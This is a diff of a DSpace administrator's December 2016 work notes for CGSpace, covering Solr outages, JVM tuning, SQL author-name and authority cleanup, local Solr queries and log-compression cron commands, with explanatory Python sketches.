    2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +
    2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
    +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
     
    • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
    • I’ve raised a ticket with Atmire to ask
    • @@ -236,13 +236,13 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
    • The first error I see in dspace.log this morning is:
    -
    2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;"b0b541c1-ec15-48bf-9209-6dbe8e338cdc"
    +
    2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;"b0b541c1-ec15-48bf-9209-6dbe8e338cdc"
     org.apache.solr.client.solrj.SolrServerException: Server refused connection at: http://localhost:8081/solr/authority
     
    • Looking through DSpace’s solr log I see that about 20 seconds before this, there were a few 30+ KiB solr queries
    • The last logs here right before Solr became unresponsive (and right after I restarted it five hours later) were:
    -
    2016-12-02 03:00:42,606 INFO  org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&fq=-isInternal:true&fq=-(author_mtdt:"CGIAR\+Institutional\+Learning\+and\+Change\+Initiative"++AND+subject_mtdt:"PARTNERSHIPS"+AND+subject_mtdt:"RESEARCH"+AND+subject_mtdt:"AGRICULTURE"+AND+subject_mtdt:"DEVELOPMENT"++AND+iso_mtdt:"en"+)&rows=0&wt=javabin&version=2} hits=0 status=0 QTime=19
    +
    2016-12-02 03:00:42,606 INFO  org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&fq=-isInternal:true&fq=-(author_mtdt:"CGIAR\+Institutional\+Learning\+and\+Change\+Initiative"++AND+subject_mtdt:"PARTNERSHIPS"+AND+subject_mtdt:"RESEARCH"+AND+subject_mtdt:"AGRICULTURE"+AND+subject_mtdt:"DEVELOPMENT"++AND+iso_mtdt:"en"+)&rows=0&wt=javabin&version=2} hits=0 status=0 QTime=19
     2016-12-02 08:28:23,908 INFO  org.apache.solr.servlet.SolrDispatchFilter @ SolrDispatchFilter.init()
     
    • DSpace’s own Solr logs don’t give IP addresses, so I will have to enable Nginx’s logging of /solr so I can see where this request came from
    • @@ -279,7 +279,7 @@ Result = The bitstream could not be found
    • In other news, I’m looking at JVM settings from the Solr 4.10.2 release, from bin/solr.in.sh:
    # These GC settings have shown to work well for a number of common Solr workloads
    -GC_TUNE="-XX:-UseSuperWord \
    +GC_TUNE="-XX:-UseSuperWord \
     -XX:NewRatio=3 \
     -XX:SurvivorRatio=4 \
     -XX:TargetSurvivorRatio=90 \
    @@ -296,7 +296,7 @@ GC_TUNE="-XX:-UseSuperWord \
     -XX:CMSMaxAbortablePrecleanTime=6000 \
     -XX:+CMSParallelRemarkEnabled \
     -XX:+ParallelRefProcEnabled \
    --XX:+AggressiveOpts"
    +-XX:+AggressiveOpts"
     
    • I need to try these because they are recommended by the Solr project itself
    • Also, as always, I need to read Shawn Heisey’s wiki page on Solr
    • @@ -319,17 +319,17 @@ GC_TUNE="-XX:-UseSuperWord \
      • Some author authority corrections and name standardizations for Peter:
      -
      dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
      +
      dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
       UPDATE 11
      -dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
      +dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
       UPDATE 36
      -dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
      +dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
       UPDATE 14
      -dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
      +dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
       UPDATE 42
      -dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
      +dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
       UPDATE 360
      -dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
      +dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
       UPDATE 561
       
      • Pay attention to the regex to prevent false positives in tricky cases with Dutch names!
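
To see what the extra `!~ '^.*W\.?$'` condition guards against, here is a small Python sketch of the same two-part filter. The author names are invented for illustration, and `str` containment plus `re.search` are only approximations of PostgreSQL's `LIKE '%...%'` and `!~` operators.

```python
import re

# Same exclusion as the SQL above: skip values that end in "W" or "W."
EXCLUDE = re.compile(r"^.*W\.?$")


def should_standardize(text_value):
    """Mimic: text_value LIKE '%an der Hoek%' AND text_value !~ '^.*W\\.?$'."""
    return "an der Hoek" in text_value and EXCLUDE.search(text_value) is None


# Hypothetical name variants, not taken from the database.
candidates = [
    "van der Hoek, R.",
    "Van der Hoek, Rein",
    "van der Hoek, W.",
    "van der Hoek, W",
]

for name in candidates:
    print(should_standardize(name), name)
```

Without the exclusion, a different author with the same surname and the initial W would be renamed and given the wrong authority.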
      • @@ -343,7 +343,7 @@ UPDATE 561
      • The docs say a good starting point for a dedicated server is 25% of the system RAM, and our server isn’t dedicated (also runs Solr, which can benefit from OS cache) so let’s try 1024MB
      • In other news, the authority reindexing keeps crashing (I was manually running it after the author updates above):
      -
      $ time JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace index-authority
      +
      $ time JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace index-authority
       Retrieving all data
       Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
       Exception: null
      @@ -377,30 +377,30 @@ sys     0m22.647s
       
    • Querying that ID shows the fields that need to be changed:
    {
    -  "responseHeader": {
    -    "status": 0,
    -    "QTime": 1,
    -    "params": {
    -      "q": "id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
    -      "indent": "true",
    -      "wt": "json",
    -      "_": "1481102189244"
    +  "responseHeader": {
    +    "status": 0,
    +    "QTime": 1,
    +    "params": {
    +      "q": "id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
    +      "indent": "true",
    +      "wt": "json",
    +      "_": "1481102189244"
         }
       },
    -  "response": {
    -    "numFound": 1,
    -    "start": 0,
    -    "docs": [
    +  "response": {
    +    "numFound": 1,
    +    "start": 0,
    +    "docs": [
           {
    -        "id": "0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
    -        "field": "dc_contributor_author",
    -        "value": "Grace, D.",
    -        "deleted": false,
    -        "creation_date": "2016-11-10T15:13:40.318Z",
    -        "last_modified_date": "2016-11-10T15:13:40.318Z",
    -        "authority_type": "person",
    -        "first_name": "D.",
    -        "last_name": "Grace"
    +        "id": "0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
    +        "field": "dc_contributor_author",
    +        "value": "Grace, D.",
    +        "deleted": false,
    +        "creation_date": "2016-11-10T15:13:40.318Z",
    +        "last_modified_date": "2016-11-10T15:13:40.318Z",
    +        "authority_type": "person",
    +        "first_name": "D.",
    +        "last_name": "Grace"
           }
         ]
       }
    @@ -409,51 +409,51 @@ sys     0m22.647s
     
  • I think I can just update the value, first_name, and last_name fields…
  • The update syntax should be something like this, but I’m getting errors from Solr:
  • -
    $ curl 'localhost:8081/solr/authority/update?commit=true&wt=json&indent=true' -H 'Content-type:application/json' -d '[{"id":"1","price":{"set":100}}]'
    +
    $ curl 'localhost:8081/solr/authority/update?commit=true&wt=json&indent=true' -H 'Content-type:application/json' -d '[{"id":"1","price":{"set":100}}]'
     {
    -  "responseHeader":{
    -    "status":400,
    -    "QTime":0},
    -  "error":{
    -    "msg":"Unexpected character '[' (code 91) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1]",
    -    "code":400}}
    +  "responseHeader":{
    +    "status":400,
    +    "QTime":0},
    +  "error":{
    +    "msg":"Unexpected character '[' (code 91) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1]",
    +    "code":400}}
     
    • When I try using the XML format I get an error that the updateLog needs to be configured for that core
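The partial update described above can be sketched in Python as a way to build the request body. This is only a sketch under assumptions: the field names (`value`, `first_name`, `last_name`) come from the Solr response shown earlier, the `{"set": ...}` modifier is Solr's atomic update syntax, and the helper name `build_atomic_update` is hypothetical. It only builds the JSON and sends nothing, since the core in question rejects such updates until the updateLog is configured.

```python
import json


def build_atomic_update(doc_id, value, first_name, last_name):
    """Build a JSON body for a Solr atomic update that sets three fields.

    Hypothetical helper for illustration; it does not contact Solr.
    """
    doc = {
        "id": doc_id,
        # "set" replaces the stored field value in an atomic update
        "value": {"set": value},
        "first_name": {"set": first_name},
        "last_name": {"set": last_name},
    }
    # Solr expects a JSON array of documents for this style of update
    return json.dumps([doc])


body = build_atomic_update(
    "0b4fcbc1-d930-4319-9b4d-ea1553cca70b", "Grace, Delia", "Delia", "Grace"
)
print(body)
```

The printed string is what would go in the `-d` argument of the `curl` call, assuming the update handler accepts JSON.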
    • Maybe I can just remove the authority UUID from the records, run the indexing again so it creates a new one for each name variant, then match them correctly?
    -
    dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
    +
    dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
     UPDATE 561
     
    • Then I’ll reindex discovery and authority and see how the authority Solr core looks
    • After this, now there are authorities for some of the “Grace, D.” and “Grace, Delia” text_values in the database (the first version is actually the same authority that already exists in the core, so it was just added back to some text_values, but the second one is new):
    -
    $ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&wt=json&indent=true'
    +
    $ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&wt=json&indent=true'
     {
    -  "responseHeader":{
    -    "status":0,
    -    "QTime":0,
    -    "params":{
    -      "q":"id:18ea1525-2513-430a-8817-a834cd733fbc",
    -      "indent":"true",
    -      "wt":"json"}},
    -  "response":{"numFound":1,"start":0,"docs":[
    +  "responseHeader":{
    +    "status":0,
    +    "QTime":0,
    +    "params":{
    +      "q":"id:18ea1525-2513-430a-8817-a834cd733fbc",
    +      "indent":"true",
    +      "wt":"json"}},
    +  "response":{"numFound":1,"start":0,"docs":[
           {
    -        "id":"18ea1525-2513-430a-8817-a834cd733fbc",
    -        "field":"dc_contributor_author",
    -        "value":"Grace, Delia",
    -        "deleted":false,
    -        "creation_date":"2016-12-07T10:54:34.356Z",
    -        "last_modified_date":"2016-12-07T10:54:34.356Z",
    -        "authority_type":"person",
    -        "first_name":"Delia",
    -        "last_name":"Grace"}]
    +        "id":"18ea1525-2513-430a-8817-a834cd733fbc",
    +        "field":"dc_contributor_author",
    +        "value":"Grace, Delia",
    +        "deleted":false,
    +        "creation_date":"2016-12-07T10:54:34.356Z",
    +        "last_modified_date":"2016-12-07T10:54:34.356Z",
    +        "authority_type":"person",
    +        "first_name":"Delia",
    +        "last_name":"Grace"}]
       }}
     
    • So now I could set them all to this ID and the name would be ok, but there has to be a better way!
    • In this case it seems that since there were also two different IDs in the original database, I just picked the wrong one!
    • Better to use:
    -
    dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
    +
    dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
     
    • This proves that unifying author name varieties in authorities is easy, but fixing the name in the authority is tricky!
    • Perhaps another way is to just add our own UUID to the authority field for the text_value we like, then re-index authority so they get synced from PostgreSQL to Solr, then set the other text_values to use that authority ID
    • @@ -461,17 +461,17 @@ UPDATE 561
    • Deploy “take task” hack/fix on CGSpace (#290)
    • I ran the following author corrections and then reindexed discovery:
    -
    update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
    -update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
    -update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
    -update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
    -update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
    -update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
    +
    update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
    +update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
    +update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
    +update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
    +update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
    +update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
     

    2016-12-08

    • Something weird happened and Peter Thorne’s names all ended up as “Thorne”, I guess because the original authority had that as its name value:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
         text_value    |              authority               | confidence
     ------------------+--------------------------------------+------------
      Thorne, P.J.     | 18349f29-61b1-44d7-ac60-89e55546e812 |        600
    @@ -484,12 +484,12 @@ update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-417
     
    • I generated a new UUID using uuidgen | tr [A-Z] [a-z] and set it along with correct name variation for all records:
    -
    dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
    +
    dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
     UPDATE 43
     
    • Apparently we also need to normalize Phil Thornton’s names to Thornton, Philip K.:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
          text_value      |              authority               | confidence
     ---------------------+--------------------------------------+------------
      Thornton, P         | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
    @@ -506,7 +506,7 @@ UPDATE 43
     
    • Seems his original authorities are using an incorrect version of the name so I need to generate another UUID and tie it to the correct name, then reindex:
    -
    dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
    +
    dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
     UPDATE 362
     
    • It seems that, when you are messing with authority and author text values in the database, it is better to run authority reindex first (postgres→solr authority core) and then Discovery reindex (postgres→solr Discovery core)
    • @@ -520,8 +520,8 @@ UPDATE 362
    • Set PostgreSQL’s shared_buffers on CGSpace to 10% of system RAM (1200MB)
    • Run the following author corrections on CGSpace:
    -
    dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993';
    -dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
    +
    dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993';
    +dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
     
    • The authority IDs had changed since I looked a few days ago, so I had to adjust them here
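One thing worth checking in the first statement above: in SQL, `and` binds more tightly than `or`, so a trailing `or authority='...'` is not restricted by the `resource_type_id` and `metadata_field_id` conditions. The sketch below demonstrates the difference with an in-memory SQLite table standing in for PostgreSQL (both follow the same precedence rule). The authority values `old-a` and `old-b` and the field ID `99` are placeholders, not real data.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "create table metadatavalue "
    "(resource_type_id int, metadata_field_id int, authority text)"
)
rows = [
    (2, 3, "old-a"),   # author field, first old authority
    (2, 3, "old-b"),   # author field, second old authority
    (2, 99, "old-b"),  # a different field that shares the second authority
]
conn.executemany("insert into metadatavalue values (?, ?, ?)", rows)

# Without parentheses the last condition stands alone, so the row with
# metadata_field_id=99 is matched as well.
unparenthesized = conn.execute(
    "select count(*) from metadatavalue "
    "where resource_type_id=2 and metadata_field_id=3 "
    "and authority='old-a' or authority='old-b'"
).fetchone()[0]

# With parentheses both authorities are limited to the author field.
parenthesized = conn.execute(
    "select count(*) from metadatavalue "
    "where resource_type_id=2 and metadata_field_id=3 "
    "and (authority='old-a' or authority='old-b')"
).fetchone()[0]

print(unparenthesized, parenthesized)
```

Running a `select count(*)` with the same `where` clause before an `update` is a cheap way to confirm how many rows it will touch.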
    @@ -542,7 +542,7 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
  • Removing the duplicates in OpenRefine and uploading a CSV to DSpace says “no changes detected”
  • Seems like the only way to sort of clean these up would be to start in SQL:
  • -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
                       text_value                   |              authority               | confidence
     -----------------------------------------------+--------------------------------------+------------
      International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 |         -1
    @@ -554,9 +554,9 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
      International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |        600
      International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |         -1
      International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |          0
    -dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
    +dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
     UPDATE 1693
    -dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
    +dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
     UPDATE 35
     
    • Work on article for KM4Dev journal
    • @@ -577,14 +577,14 @@ UPDATE 35
    • So basically, new cron jobs for logs should look something like this:
    • Find any file named *.log* that isn’t dspace.log*, isn’t already zipped, and is older than one day, and zip it:
    -
    # find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex ".*\.log.*" ! -iregex ".*dspace\.log.*" ! -iregex ".*\.(gz|lrz|lzo|xz)" ! -newermt "Yesterday" -exec schedtool -B -e ionice -c2 -n7 xz {} \;
    +
    # find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex ".*\.log.*" ! -iregex ".*dspace\.log.*" ! -iregex ".*\.(gz|lrz|lzo|xz)" ! -newermt "Yesterday" -exec schedtool -B -e ionice -c2 -n7 xz {} \;
     
    • Since there is xzgrep and xzless we can actually just zip them after one day, why not?!
    • We can keep the zipped ones for two weeks just in case we need to look for errors, etc, and delete them after that
    • I use schedtool -B and ionice -c2 -n7 to set the CPU scheduling to SCHED_BATCH and the IO to best effort which should, in theory, impact important system processes like Tomcat and PostgreSQL less
    • When the tasks are running you can see that the policies do apply:
    -
    $ schedtool $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}') && ionice -p $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}')
    +
    $ schedtool $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}') && ionice -p $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}')
     PID 17049: PRIO   0, POLICY B: SCHED_BATCH   , NICE   0, AFFINITY 0xf
     best-effort: prio 7
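
The selection rules in the `find` command above can be sketched in Python to make them easier to test in isolation. This is an approximation under assumptions: `should_compress` is a hypothetical helper, the three patterns are copied from the `-iregex` arguments (which match the whole path, hence `fullmatch`), and "older than one day" is simplified to 86400 seconds.

```python
import re

# Patterns copied from the find command; -iregex is case-insensitive
LOG_NAME = re.compile(r".*\.log.*", re.IGNORECASE)
DSPACE_LOG = re.compile(r".*dspace\.log.*", re.IGNORECASE)
COMPRESSED = re.compile(r".*\.(gz|lrz|lzo|xz)", re.IGNORECASE)


def should_compress(path, mtime, now, max_age=86400):
    """Return True if a log file at `path` should be compressed.

    `mtime` and `now` are Unix timestamps in seconds.
    """
    is_log = LOG_NAME.fullmatch(path) is not None
    is_dspace_log = DSPACE_LOG.fullmatch(path) is not None
    is_compressed = COMPRESSED.fullmatch(path) is not None
    is_old = now - mtime >= max_age
    return is_log and not is_dspace_log and not is_compressed and is_old


now = 200000
for candidate in [
    "/log/solr.log.2016-12-01",
    "/log/dspace.log.2016-12-01",
    "/log/solr.log.2016-12-01.xz",
]:
    print(candidate, should_compress(candidate, 0, now))
```

The example paths are made up; only the first one is selected, because the second is a `dspace.log*` file and the third is already compressed.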
     
      @@ -679,11 +679,11 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
    • None of our users in African institutes will have IPv6, but some Europeans might, so I need to check if any submissions have been added since then
    • Update some names and authorities in the database:
    -
    dspace=# update metadatavalue set authority='5ff35043-942e-4d0a-b377-4daed6e3c1a3', confidence=600, text_value='Duncan, Alan' where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*Duncan,? A.*';
    +
